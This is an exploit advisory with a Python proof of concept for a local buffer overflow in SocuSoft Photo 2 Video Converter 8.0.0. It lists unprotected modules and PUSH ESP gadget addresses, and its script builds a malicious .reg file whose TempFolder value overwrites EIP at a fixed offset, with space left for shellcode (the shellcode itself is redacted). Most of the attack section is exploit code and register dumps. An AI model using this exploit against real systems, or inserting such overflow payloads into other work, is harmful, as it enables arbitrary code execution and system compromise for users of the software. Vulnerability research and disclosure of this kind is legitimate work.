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SocuSoft Co. Photo 2 Video Converter 8.0.0 Code Execution / DoS


SocuSoft Co. Photo 2 Video Converter Free and Pro variants version 8.0.0 suffer from a buffer overflow in the pdmlog.dll library.

MD5 | 0606514841e96d1205b7eb9b1c216c23

_ _____ _____ _____
| | | _ | |____ | |____ |
| |__ | |/' |_ __ ___ / / ___ _ __ / /_ __
| '_ \| /| | '_ ` _ \ \ \/ __| '__| \ \ \ /\ / /
| | | \ |_/ / | | | | |.___/ / (__| | .___/ /\ V V /
|_| |_|\___/|_| |_| |_|\____/ \___|_| \____/ \_/\_/

> _[C O N T A C T] :
Twitter: @ret2eax
Email: ret2eax@riseup.net
Blog: ret2eax.pw
Website: hackthegrid.com.au

| Impacted Vendor: SocuSoft Co. |
| Vulnerable Software: Photo 2 Video Converter Free & Pro Variants |
| Software URL: http://www.socusoft.com/ |
| Effected Release: 8.0.0 |
| Vulnerability Type: Code Execution, Denial of Service |
| Date Released: 01/12/2017 |
| Released by: ret2eax |


[+]----------------------------[ S U M M A R Y ]------------------------------[+]

Socusoft's Photo 2 Video Converter v8.0.0 (Free and Professional variants)
contains a local buffer overflow condition in the pdmlog.dll library.
Exploitation can result in x86 register rewrites to control program execution
flow, therefore, resulting in ability to execute arbitrary shellcode leading
to complete system compromise.

[+]-------------------------[ D E S C R I P T I O N ]------------------------[+]

One of many modules, the following contains no illegal address characters
i.e. '\0x00'.

| Rebase | SafeSEH | ASLR | NXCompat | OS Dll | Module |
| False | False | False | False | False | DVDPhotoData.dll |

The following PUSH ESP instruction addresses are suitable to redirect
program execution:


0x10002352 push esp; ret
0x10013945 push esp; retn 0x0004
0x1004cb83 push esp; retn 0x0008
0x1004cbb8 push esp; retn 0x0008
0x1004cc11 push esp; retn 0x0008

[+]-----------------------[ P R E C O N D I T I O N S ]---------------------[+]

1. Tested on Windows Server 2008 R2
2. Import generated .reg prior to restarting the executable within a debugger
3. Overflow condition observed to occur in pdmlog.dll

[+]------------------------[ E X P L O I T A T I O N ]----------------------[+]

A Proof of Concept is as follows:

>_[Python Script - SHELLCODE REDACTED]:



# EAX 42424242
# ECX 0002BF3B pdmlog.<ModuleEntryPoint>
# EDX 00020000 pdmlog.00020000
# EBX 00020000 pdmlog.00020000
# ESP 035BFB90
# ESI 00000002
# EDI 00000000
# EIP 42424242

# EAX 10013945 DVDPhoto.10013945
# ECX 0002BF3B pdmlog.<ModuleEntryPoint>
# EDX 00020000 pdmlog.00020000
# EBX 00020000 pdmlog.00020000
# ESP 03A0FB90
# ESI 00000002
# EDI 00000000
# EIP 10013945 DVDPhoto.10013945 <- EIP Overwrite '\x45\x39\x01\x10'

# outfile
file = "proof-of-concept.reg"

# register re-write
padding = "\x41" * 548
eipOffset = "\x45\x39\x01\x10" # PUSH ESP (0x10013945)
stackRewrite = "\x43" * 400 # Shellcode Space

# generate exploit file containing above payload instructing EIP overwrite

poc = "Windows Registry Editor Version 5.00\n\n"
poc = poc + "[HKEY_CURRENT_USER\Software\Socusoft Photo to Video Converter Free Version\General]\n"
poc = poc + "\"TempFolder\"=\"" + padding + eipOffset + stackRewrite + "\""

print "[*] Generating exploit contents...\n";
print "[*] Creating payload file...\n";
writeFile = open (file, "w")
writeFile.write( poc )
print "[*] Success!";
print "[!] ERROR!";



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